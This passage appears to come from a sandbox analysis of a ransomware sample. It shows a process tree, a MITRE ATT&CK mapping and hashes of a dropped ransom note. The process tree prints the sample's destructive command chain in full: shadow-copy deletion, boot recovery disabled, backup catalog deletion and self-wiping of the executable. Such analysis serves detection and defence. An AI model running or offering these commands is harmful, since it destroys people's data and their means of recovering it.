  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2332
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1260
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled no
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2172
- - C:\Windows\system32\wbadmin.exe
    wbadmin delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:3068
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3840
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:3896
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe"
    3⤵
    PID:3952
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 724
  2⤵
  - Program crash
  PID:3864

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:332

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:2240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\DVD Maker\de-DE\Restore-My-Files.txt

Filesize
1KB

MD5
340d64bb0c4ff9e0917eb9a4b4e62764

SHA1
5031530dd96ea0cb3491f02f83d03624e18a7fba

SHA256
16c3d6e1cfc551c8878010133446fe6872251c3fbecd8d68a1f3d9710daa9e99

SHA512
50279650d32f849c22ba21d0c334480184ad9cc4dde38ee3ca9409eeed94e7192f11f496414f1ea947bba3edc685ebc94104d64a075e883497e45e71f65d8efb

Download Submit